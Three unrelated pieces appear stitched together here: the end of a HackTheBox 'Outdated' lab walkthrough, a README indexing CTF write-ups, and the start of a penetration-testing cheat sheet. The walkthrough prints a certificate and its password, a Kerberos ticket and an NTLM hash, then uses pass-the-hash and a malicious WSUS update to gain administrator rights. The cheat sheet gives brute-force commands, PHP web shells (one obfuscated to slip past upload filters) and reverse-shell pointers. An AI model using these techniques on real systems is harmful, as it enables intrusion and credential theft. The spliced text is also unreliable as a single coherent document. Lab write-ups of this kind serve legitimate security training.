/certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCWUEgglhMIIJXTCCBhYGCSqGSIb3DQEHAaCCBgcEggYDMIIF/zCCBfsGCyqGSIb3DQEMCgECoIIE/jCCBPowHAYKKoZIhvcNAQwBAzAOBAinaCibDG/RpAICB9AEggTYxqhwKtdfMRcDL6aGkUyqzhtcCDA+zXcVca/jinD6CALAolyHncz2K9gMDVSyfxCFU3RlHibMpg/Wpe/V2DR1VHcQ47RcJQHx4BfZnQ4SlkRq/2LdE89t7qcC19r9ExfDl3pF9HVr8ZZGjzDKKrI45ZSWJsUwH7gxTaceHCxEzdCeKuyCN8d676Dhdlw61w3Ys0nVhXymjxSKTbebpTAGCBwGlErAQ/mn5n5AgWbO0EmraEepxNjZODZ/ivnaTaanASK4OlNKE4vUQqCUAL/iiZYEzO6cBaJQhiLEwf+MVFq58oI7aGsMstSwxEPm95U/dH5smURP/+Lvd2vKMIYw1UjO/Y/iM96Gph4ts2oeeKkQDR0xx1AObPfxs3BTLZ/q2g3D2UnPXTJ7grQ47X4+F5DVstq/ZJqfaH0AIx2rEVA5s3Ih4XVgeImR+wxvIEQMuAMSFISdMsoeWQGhLLdMGFsOqlCwUuLnW1waAp24pXGMmhek0W0XaeT0wZ2SF9OisZJfC65FwoH1FDDdydXOaKeNyAtwQR4rSv2s9CUBpwEIgq6qkuQKCPVoZ05lmf0CjUP2JSKbvBo23buXI1nVX4kKfms4Ug0V2ux7xnIdB2HfjGp60tYkxbACs0GsgpsKfISI53J+4nWH6i/8BkmFo3c3yz/GzKo8BRHQZK9tY8AQ3NOC15LKmPSC1AUtxCVV5tbW94P9/QdMWSQS6ocNGF94nVDnkC+in8axz4yfvI5CFUUAcvWnPazqBgjsDH49B0WRyX5HfVKRRg5+uhSnqNdcVdAl4+RfcizCQbg+wVNyNNc/lzU3IJYzFFnWc9x08HNnw/bXuFpX59uRImcArskTFfmXNuzhdy93D9ZEeJjK8Z9TjZW5LTq3bWI4bVF8YYYE4N6sfODN1xRGls0sHM9wpA86FJr0iHwlcRuXbeDXDXW6u0850YTJOdK+RurC0EdU8rFhyo32tB1ACv2bomHxNePRWitsdoZO67Nw47udi8PKmED7vm8fuhkPZ9T+v96tQkalEzvGtdf0wR15UrNgyHEnm9BaVBBboqRnt+oitTWy0sY3tzgftS16SVzq6HSU7ewulsSz2Re8tA6mAN9vD85p6bZEG0kYyrqehARljqmYFw3lNPt6v7+P+Rwu+x9mg+/a/s6Y1w4JKETd4OVhepdg8SsAnv/wMdA67i/bgfOkLutt+KrsXsvP6JLg3gqdvLVZxFburrfa1za1aB/nJv/36e9u07F9m2SozzF8txbBco3Y67mu58wODDxkw39iGIg5q9BJXyBq/hZ10AqF7WGgHuL/3smOWMIyxFS1cnzqCRh25VsAEVLd/a0ZmLB2qfF8gzZ6cNazn9t3KNvb8G5NsOlSLvK8we4R9yucWTavzPJqPvYEYEveA0kIyYnM2DtYXw02Gk/v/oxQZUIlGJvSBk2gxnAp9ul0MKDvVshxxZiI0xdkK35vU/G1NgPty/VIMHlYL2Qurf+PLaAAEjM+IIas8RMKF0K8mvfOJ2z2bsdc1rAgpTnPbzMUU+03vGlisPabc8cPT3F4MoT2gRSliTTOBzqrHF/VGptjbdsEAMNUxqzDP1ZaLJ1vwsX+nJK4qgtG5Ztgx2UDJoEpIhyKMnGDmL4aCz8XqBAFvTfjsJsxjjGB6TATBgkqhkiG9w0BCRUxBgQEAQAAADBXBgkqhkiG9w0BCRQxSh5IAGYAMABhADYAYQBlAGMANwAtADAAMgAzADgALQA0ADMAZQAwAC0AOAA3ADAANQAtAGIAYgBjADgAOQA1AGEANQBkAGUANAA4MHkGCSsGAQQBgjcRATFsHmoATQBpAGMAcgBvAHMAbwBmAHQAIABFAG4AaABhAG4AYwBlAGQAIABSAFMAQQAgAGEAbgBkACAAQQBFAFMAIABDAHIAeQBwAHQAbwBnAHIAYQBwAGgAaQBjACAAUAByAG8AdgBpAGQAZQByMIIDPwYJKoZIhvcNAQcGoIIDMDCCAywCAQAwggMlBgkqhkiG9w0BBwEwHAYKKoZIhvcNAQwBAzAOBAil19INJylSLQICB9CAggL4cNXj9HsIxZKhFUraAeKAQ/S52I5qQ6zjF+2ztxCjipbKaZhhDFNOzyPIqMbVBf7qO6h1PKBHSyxOkt9s+GWD0AHHttcv8gyQpxLL+6GhdFTzSMjcVcObILaC0ne9u6TYXV0rpdaAiivaTlxcZnQ+fsImRrri1QpPwgMQj6lbN+3qIhd1wxsoGR2Ol99uf4yFafK/vmY8ZHVfXy1J58wbIH3zD9bN8ZGNJh+hX2dGRKCBQ6Peh/T2w61uXukw/SymX0xDBifiNIN5xVrA7YvCurBWhkK3ukdj+Z2D2bt4RB0W9UKyU0zrOe++jhxM5NwDdk5snqAr3szZl+akwX5wspZws17tn9b8w/Nm9ayx9RZ4/CftcdK4PAaJOtHnhb0D9yV8ntRXK8i81vEprQ0+kd9R90QRO3Bg6Hf3VJr4gh0KvjwwCQB/QA1OhRgM74AzbGEfTI+mkmu7hefHcGRnnahlIBfHvwNnVSXeKd+qbQIbTsrUt2H0Yaj8WS/b0UWuL8Is7p8muPPH3xFdXMrguY7iYEzHl66rcjAFPxM5qcKU4oMNSjI7zpsLou1B1yQ8Q45och+Xs7o3tu7FZALcErsAC1tCPCZB2XiwO5nNe3PxhXVIHkaRtFW9VAfzO7kVDUuzis8NgtMU/kN5G6fHaJ+t8D+2aoiku6r9f1IQyDR7I9eepOsJQE0SHUJWC2D/KJjLUhasiY7nwS6ar4XBmQN0twGqRvKPExRvG5ng6CNp4ghxVydjO817ZSR533KDL79J43E8ACotyvOhzLpsUXQQ5y1CkqU+ITqCFdHnd3CswfEV/Dhga6RSWVBpzM+5hUizxufwo12paObSU5O0maVOylvV00xD/AKhqQweF3zhiCxtxqvXwMK8CxlOm3jPUiVwlTpamOUMBxceRomdRg7UF4+5cjHW2YTU4XJCMZV4S8igFyT4AJBmBeQ4Td7kMbXghjo/yAGKOasZSZ5AKjGvkhWX3p2eVE0RrEKtlSZIRpieWl8bqzA7MB8wBwYFKw4DAhoEFKOQyEl3cmnDLhyU2BcZjJ+apoU8BBQD4pXnQJGN0hcslajy1KjoymWQXAICB9A= /password:"hXrbj8cXSRlDXanQ" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.0 [*] Action: Ask TGT [*] Using PKINIT with etype rc4_hmac and subject: CN=sflowers [*] Building AS-REQ (w/ PKINIT preauth) for: 'outdated.htb\sflowers' [*] Using domain controller: 172.16.20.1:88 [+] TGT request successful! [*] base64(ticket.kirbi): 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 ServiceName : krbtgt/outdated.htb ServiceRealm : OUTDATED.HTB UserName : sflowers UserRealm : OUTDATED.HTB StartTime : 11/7/2022 7:49:30 PM EndTime : 11/8/2022 5:49:30 AM RenewTill : 11/14/2022 7:49:30 PM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : Z+EeHZ55dvE2nA1NwU3vNw== ASREP (key) : FD354BE0581A056BB7B9E9AE03F0F0F8 [*] Getting credentials using U2U CredentialInfo : Version : 0 EncryptionType : rc4_hmac CredentialData : CredentialCount : 1 NTLM : 1FCDB1F6015DCB318CC77BB2BDA14DB5 ``` Now we can use the NTLM hash ```1FCDB1F6015DCB318CC77BB2BDA14DB5``` of the user ```sflowers``` using ```evil-winrm```: ```console ┌─[evyatar9@parrot]─[/hackthebox/Outdated] └──╼ $ evil-winrm -i outdated.htb -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5 Evil-WinRM shell v3.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\sflowers\Documents> whoami outdated\sflowers *Evil-WinRM* PS C:\Users\sflowers\Documents> cd ../Desktop *Evil-WinRM* PS C:\Users\sflowers\Desktop> dir Directory: C:\Users\sflowers\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 8/3/2022 4:19 PM 514472 PsExec64.exe -ar--- 11/7/2022 7:14 PM 34 user.txt t*Evil-WinRM* PS C:\Users\sflowers\Desktop> type user.txt 75fe7817d71a5eea32a5f4040dc91f49 ``` And we get the user flag ```75fe7817d71a5eea32a5f4040dc91f49```. ### Root By running ```winpeas``` we can see the following: ```console _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] WSUS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit) [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus WUServer REG_SZ http://wsus.outdated.htb:8530 ``` We can compromise the system if the updates are not requested using HTTPS (Reference)[https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus]. We can validate it using the following registry key: ```console *Evil-WinRM* PS C:\Users\sflowers\Downloads> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates REG_DWORD 0x1 NoAutoUpdate REG_DWORD 0x0 AUOptions REG_DWORD 0x3 ScheduledInstallDay REG_DWORD 0x0 ScheduledInstallTime REG_DWORD 0x3 ScheduledInstallEveryWeek REG_DWORD 0x1 UseWUServer REG_DWORD 0x1 ``` ```UseWUServer``` is ```1``` meaning the machine is exploitable. To exploit it we need to use a tool called ```SharpWSUS```, which will create an update and approve it for deployment to a machine. We can get ```SharpWSUS``` from [https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-SharpWSUS.ps1](https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-SharpWSUS.ps1). Now we can create a new update using the following command to add ```sflowers``` to the ```administrators``` group using ```PsExec64.exe```: ```console *Evil-WinRM* PS C:\Users\sflowers\Downloads> .\SharpWSUS.exe create /payload:"C:\Users\sflowers\Desktop\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c 'net localgroup administrators sflowers /add'" /title:"meowmeow1" ____ _ __ ______ _ _ ____ / ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___| \___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) | |____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red Team [*] Action: Create Update [*] Creating patch to use the following: [*] Payload: PsExec64.exe [*] Payload Path: C:\Users\sflowers\Desktop\PsExec64.exe [*] Arguments: -accepteula -s -d cmd.exe /c 'net localgroup administrators sflowers /add' [*] Arguments (HTML Encoded): -accepteula -s -d cmd.exe /c &amp;#39;net localgroup administrators sflowers /add&amp;#39; ################# WSUS Server Enumeration via SQL ################## ServerName, WSUSPortNumber, WSUSContentLocation ----------------------------------------------- DC, 8530, c:\WSUS\WsusContent ImportUpdate Update Revision ID: 30 PrepareXMLtoClient InjectURL2Download DeploymentRevision PrepareBundle PrepareBundle Revision ID: 31 PrepareXMLBundletoClient DeploymentRevision [*] Update created - When ready to deploy use the following command: [*] SharpWSUS.exe approve /updateid:99630beb-fba1-4133-82be-dc884a7ab4ee /computername:Target.FQDN /groupname:"Group Name" [*] To check on the update status use the following command: [*] SharpWSUS.exe check /updateid:99630beb-fba1-4133-82be-dc884a7ab4ee /computername:Target.FQDN [*] To delete the update use the following command: [*] SharpWSUS.exe delete /updateid:99630beb-fba1-4133-82be-dc884a7ab4ee /computername:Target.FQDN /groupname:"Group Name" [*] Create complete ``` Now we need to deploy it using: ```console *Evil-WinRM* PS C:\Users\sflowers\Downloads> .\SharpWSUS.exe approve /updateid:99630beb-fba1-4133-82be-dc884a7ab4ee /computername:dc.outdated.htb /groupname:"evyatar9" ____ _ __ ______ _ _ ____ / ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___| \___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) | |____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red Team [*] Action: Approve Update Targeting dc.outdated.htb TargetComputer, ComputerID, TargetID ------------------------------------ dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1 Group Exists = False Group Created: evyatar9 Added Computer To Group Approved Update [*] Approve complete ``` Check the update status using: ```console *Evil-WinRM* PS C:\Users\sflowers\Downloads> .\SharpWSUS.exe check /updateid:99630beb-fba1-4133-82be-dc884a7ab4ee /computername:dc.outdated.htb ____ _ __ ______ _ _ ____ / ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___| \___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) | |____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red Team [*] Action: Check Update Targeting dc.outdated.htb TargetComputer, ComputerID, TargetID ------------------------------------ dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1 [*] Update is installed [*] Check complete ``` Once the update is installed we need to re-login and run ```net user sflowers``` to validate: ```console ┌─[evyatar9@parrot]─[/hackthebox/Outdated] └──╼ $ evil-winrm -i outdated.htb -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5 Evil-WinRM shell v3.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\sflowers\Documents> net user sflowers User name sflowers Full Name Susan Flowers Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 6/20/2022 10:04:09 AM Password expires Never Password changeable 6/21/2022 10:04:09 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 6/15/2022 9:48:27 PM Logon hours allowed All Local Group Memberships *Administrators *Remote Management Use *WSUS Administrators Global Group memberships *Domain Users The command completed successfully ``` And we can see that we are in the ```Administrators``` group. ```console *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt 9b33aa06cac9bd85fe15723c988026ed ``` And we get the root flag ```9b33aa06cac9bd85fe15723c988026ed```.
# CTF Writeups <p align="center"> <img src="resources/images/logo.jpg"> <br> <i>Writeups Challenges I have solved</i> [![xiosec - CTF-writeups](https://img.shields.io/static/v1?label=xiosec&message=CTF-writeups&color=blue&logo=github)](https://github.com/xiosec/CTF-writeups) [![stars - CTF-writeups](https://img.shields.io/github/stars/xiosec/CTF-writeups?style=social)](https://github.com/xiosec/CTF-writeups) [![forks - CTF-writeups](https://img.shields.io/github/forks/xiosec/CTF-writeups?style=social)](https://github.com/xiosec/CTF-writeups) [![GitHub release](https://img.shields.io/github/release/xiosec/CTF-writeups?include_prereleases=&sort=semver)](https://github.com/xiosec/CTF-writeups/releases/) [![License](https://img.shields.io/badge/License-MIT-blue)](#license) [![issues - CTF-writeups](https://img.shields.io/github/issues/xiosec/CTF-writeups)](https://github.com/xiosec/CTF-writeups/issues) </p> <i>You can see all the writeups here</i> - <a href="https://medium.com/@xiosec/"><img title="Medium" src="https://img.shields.io/badge/Medium-12100E?style=for-the-badge&logo=medium&logoColor=white"/></a> - [![xiosec - xiosec.github.io](https://img.shields.io/static/v1?label=xiosec&message=xiosec.github.io&color=blue&logo=github)](https://xiosec.github.io/) * [Writeups](https://github.com/xiosec/CTF-writeups) * [HackTheBox](#hackthebox) * [TryHackMe](#tryhackme) * [CTF](#ctf) * [CTFLearn](#ctflearn) # HackTheBox | Name | Type | Descriptions | Writeup | | ----- | ---- | ------------ | ------- | | Previse | Machine | Previse Hackthebox walkthrough | Removed ❌ | | Toxic | Web | Humanity has exploited our allies, the dart frogs, for far too long, take back the freedom of our lovely poisonous friends. Malicious input is out of the question when dart frogs meet industrialisation. 🐸 | [Writeup](HackTheBox/challenges/web/Toxic) | | Emdee five for life | Web | Can you encrypt fast enough? | [Writeup](HackTheBox/challenges/web/Emdee-five-for-life) | | FreeLancer | Web | Can you test how secure my website is? Prove me wrong and capture the flag! | [Writeup](HackTheBox/challenges/web/FreeLancer) | | Templated | Web | Can you exploit this simple mistake? | [Writeup](HackTheBox/challenges/web/Templated) | | Impossible Password | Reversing | Are you able to cheat me and get the flag? | [Writeup](HackTheBox/challenges/reversing/Impossible-Password) | | Illumination | Forensics | A Junior Developer just switched to a new source control platform. Can you find the secret token? | [Writeup](HackTheBox/challenges/forensics/Illumination) | | Phonebook | Web | Who is lucky enough to be included in the phonebook? | [Writeup](HackTheBox/challenges/web/Phonebook) | | baby ninja jinja | Web | The elders of the village summoned you to take the reigns after the recent death of you father. It's time to end the emperor's gruesome tyranny. | [Writeup](HackTheBox/challenges/web/baby-ninja-jinja) | | Gunship | Web | A city of lights, with retrofuturistic 80s peoples, and coffee, and drinks from another world... all the wooing in the world to make you feel more lonely... this ride ends here, with a tribute page of the British synthwave band called Gunship. 🎶 | [Writeup](HackTheBox/challenges/web/Gunship) | | Hancliffe | Machine | Hancliffe Hackthebox walkthrough | Removed ❌ | | Pandora | Machine | Hackthebox Pandora walkthrough | Removed ❌ | | Shibboleth | Machine | Hackthebox Shibboleth walkthrough | Removed ❌ | # Tryhackme | Name | Type | Descriptions | Writeup | | ----- | ---- | ------------ | ------- | | Basic Malware RE | Room | This room aims towards helping everyone learn about the basics of “Malware Reverse Engineering”. | [Writeup](https://medium.com/@xiosec/tryhackme-basic-malware-re-bfcd518fd314) | | Reversing ELF | Room | Room for beginner Reverse Engineering CTF players. | [Writeup](https://medium.com/@xiosec/tryhackme-reversing-elf-60ab96969e41) | | Reverse Engineering | Room | This room focuses on teaching the basics of assembly through reverse engineering. | [Writeup](https://medium.com/@xiosec/tryhackme-reverse-engineering-9cd408849f13) | | Blue | Machine | Deploy & hack into a Windows machine, leveraging common misconfigurations issues. | [Writeup](https://medium.com/@xiosec/tryhackme-blue-1ccfae7c2e8a) | | OWASP Top 10 | Room | Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks. | [Writeup](https://medium.com/@xiosec/tryhackme-owasp-top-10-e2b342c4f9f8) | | Nmap Room | Room | An in depth look at scanning with Nmap, a powerful network scanning tool. | [Writeup](https://medium.com/@xiosec/tryhackme-nmap-room-9db134d5c8cc) | | The find command | Room | A learn-by-doing approach to the find command. | [Writeup](https://medium.com/@xiosec/tryhackme-the-find-command-d64026d89c3) | | Disk Analysis & Autopsy | Forensic | Ready for a challenge? Use Autopsy to investigate artifacts from a disk image. | [Writeup](https://medium.com/@xiosec/tryhackme-disk-analysis-autopsy-f967c64feaf1) | | Internal | CTF | Penetration Testing Challenge | [Writeup](https://medium.com/@xiosec/tryhackme-internal-a64eed0b1562) | | Lumberjack Turtle | CTF | No logs, no crime... so says the lumberjack. | [Writeup](https://medium.com/@xiosec/tryhackme-lumberjack-turtle-db006d0a589e) | | Brainpan 1 | CTF | Reverse engineer a Windows executable, find a buffer overflow and exploit it on a Linux machine. | [Writeup](https://medium.com/@xiosec/tryhackme-brainpan-1-ff227d42189e) | # CTF | Name | Format | Descriptions | Writeup | | ----- | ------ | ------------ | ------- | | [picoCTF 2022](https://ctftime.org/event/1578) | Jeopardy | picoCTF 2022 is an annual capture-the-flag (CTF) hacking competition where participants gain access to a safe and unique hands on experience. | [Writeup](https://xiosec.github.io/picoctf2022) | | [CyberApocalypseCTF2022](https://ctftime.org/event/1639) | Jeopardy | A super villain named Draeger escaped from a maximum security prison, formed his own evil squad, and convinced the Intergalactic Federal Government to work for him! You are a group of misfits that came together under unlikely circumstances, each with their own hacking “superpowers” and past with Draeger… | [Writeup](https://xiosec.github.io/cyberapocalypse2022) | | [Lexington Informatics Tournament CTF 2022](https://ctftime.org/event/1694) | Jeopardy | Lexington Informatics Tournament CTF 2022 is a Jeopardy-style, beginner-friendly online CTF that's open to everyone. It is hosted by the LexMACS club from Lexington High School. | [Writeup](https://xiosec.github.io/litctf2022/) | # CTFLearn | Name | Type | Descriptions | Writeup | | ----- | ---- | ------------ | ------- | | Inj3ction Time | Web | I stumbled upon this website: http://web.ctflearn.com/web8/ and I think they have the flag in their somewhere. UNION might be a helpful command | [Writeup](CTFlearn/web/Inj3ction-Time) | | Calculat3 M3 | Web | Here! http://web.ctflearn.com/web7/ I forget how we were doing those calculations, but something tells me it was pretty insecure. | [Writeup](CTFlearn/web/Calculat3-M3) | ## License Released under [MIT](/LICENSE) by [@xiosec](https://github.com/xiosec).
<b>Table of Contents</b> - [Enumeration](#enumeration) * [Generic Enumeration](#genumeration) * [HTTP Enumeration](#httpenumeration) * [SSH Enumeration](#sshenumeration) * [SMB Enumeraion](#smbenumeration) * [SNMP Enumeration](#snmpenumeration) - [Explotation](#explotation) * [BOF Based Exploits](#bof) * [Weak Credentials](#weakcreds) * [HTTP Bruteforce](#httpbrute) * [Password Cracking](#passcrack) * [RCE](#rce) * [PHP RCE](#phprce) * [RCE via webshell](#rcewebshell) * [RCE WMIC (powershellless)](#rcewmic) * [LOLBins](#lolbins) - [Privilege Escalation](#privesc) * [Linux](#linux) * [Windows](#windows) * [Kernel Exploits](#kernel) - [Tunneling & Port Forwarding](#tunneling) * [SSH over TCP](#sshovertcp) * [TCP over HTTP](#tcpoverhttp) * [1. reGeorg](#regeorg) * [2. ABPTTS](#abptts) * [HTTP Redirectors](#httpredirectors) * [1. socat](#socatred) * [2. iptables](#iptablesred) * [Windows Socks Proxy](#windowsocks) * [Man's poor VPN](#poor) - [Windows Active Directory](#windowsad) * [Bypass Applocker](#applocker) * [Pass The Hash](#pth) * [Kerberos](#krb) * [Miscellaneous](#miscwin) - [Reverse Shells](#revshells) * [DNS with dnscat2](#dns) * [ICMP](#icmp) * [HTTP through proxy](#httpproxy) - [Miscellaneous](#misc) * [Interactive Reverse Shell](#interactiveshell) * [rbash Jail Escape](#jailescape) * [Windows File Transfer](#windowstransfer) * [Bypass VPN routing restrictions](#vpnrestrict) * [AV Bypass](#avbypass) --- <a name="enumeration"></a><h2> Enumeration </h2> <a name="genumeration"></a><h3>Generic Enumeration</h3> - port fullscan - UDP scan <a name="httpenumeration"></a><h3> HTTP Enumeration</h3> - dirsearch big.txt -e sh,txt,htm,php,cgi,html,pl,bak,old - banner inspection - review source code - bruteforce with cewl-based dictionary - searchsploit look at versions properly - test all the paths with the exploits, mangle it - nmap --script vuln - nmap --script safe (ssl-cert, virtual hosts) - always incercept with Burp - nikto -h - LFI, RFI, SQL, RCE, XXE, SSRF injections - PUT method all directories - Change POST body encoding with Burp - Bruteforce parameter names - dirsearch with cookie once authenticated - download vulnerable application from exploit-db and examine it <a name="sshenumeration"></a><h3>SSH Enumeration</h3> - shellshock - bruteforce - user_enum - Debian OpenSSL Predictable PRNG <a name="smbenumeration"></a><h3>SMB Enumeration</h3> - nmap --script vuln - nmap --script smb* - nmap --script smb-enum-shares,smb-ls - enum4linux <a name="snmpenumeration"><h3> SNMP Enumeration</h3> - snmpcheck - snmpenum <a name="explotation"></a><h2> Explotation </h2> <a name="bof"></a><h3> BOF exploit-based </h3> - change shellcode - make sure all badchars are removed - read the exploit properly in case this makes changes in the shellcode - capture traffic with wireshark making sure the entire shellcode is transmited - run the exploit several times - make sure the JMP ESP matches OS and language <a name="weakcreds"></a><h3> Weak Credentials </h3> <a name="httpbrute"></a><b> HTTP Brute Force </b> - wfuzz POST ```wfuzz --hc 404 -c -z list,admin -z file,/root/Documents/SecLists/Passwords/korelogic-password.txt -d "user=FUZZ&password=FUZ2Z" http://192.168.30.161/admin/index.php``` - hydra POST ```hydra 192.168.30.161 -s 80 http-form-post "/admin/index.php:user=^USER^&password=^PASS^:Moved Temporarily" -l admin -P /root/Documents/SecLists/Passwords/korelogic-password.txt -t 20``` - wfuzz NTLM ```wfuzz -c --ntlm "admin:FUZZ" -z file,/root/Documents/SecLists/Passwords/darkc0de.txt --hc 401 https://<ip>/api``` - wfuzz Basic Auth through Proxy ```wfuzz -c --hc 404,400,401 -z file,/root/Documents/Audits/Activos/names.txt -z file,/root/Documents/Audits/Activos/names.txt --basic "FUZZ:FUZ2Z" -p 127.0.0.1:8080 https://<ip>/api/v1/``` <a name="passcrack"></a><b> Password Cracking </b> - zip `fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip ` - /etc/shadow <pre> unshadow passwd shadow > passwords john --wordlist=/usr/share/wordlists/rockyou.txt passwords </pre> - keepass <pre> keepass2john /root/Desktop/NewDatabase.kdb > file john -incremental:alpha -format=keepass file </pre> - Bruteforce Salted <pre> for j in $(cat cipher); do echo $j; for i in $(cat digestion); do /root/Documents/HTB/Hawk/bruteforce-salted-openssl/bruteforce-salted-openssl -t 10 -f /usr/share/wordlists/rockyou.txt -c $j -d $i ../miau.txt -1 2>&1 | grep "candidate" ; done ; done </pre> <pre>openssl aes-256-cbc -d -in ../miau.txt -out result.txt -k friends</pre> <a name="rce"></a><h2> RCE </h2> <a name="phprce"></a><h3>PHP RCE</h3> test: ```<?php phpinfo(); ?>``` simple shell: ```<?php system($_GET["c"]); ?>``` ```<?php `$_GET["c"]`; ?>``` file upload: ```<?php file_put_contents('/var/www/html/uploads/test.php', '<?php system($_GET["c"]);?>'); ?>``` file upload evasion: rot13 + urlencode ```<?php $payload="%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E"; file_put_contents('/var/www/html/uploads/test8.php', str_rot13(urldecode($payload))); ?>``` <a name="rcewebshell"></a><h3>RCE via webshell</h3> - All pentest monkey reverse shells: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - msfvenom x86/linux/shell_reverse_tcp -f elf - Metasploit `web_delivery` module - which wget | nc <ip> <port> <a name="rcewmic"></a><h3>RCE via WMIC</h3> Powershell without powershell: Generate payload with web_delivery 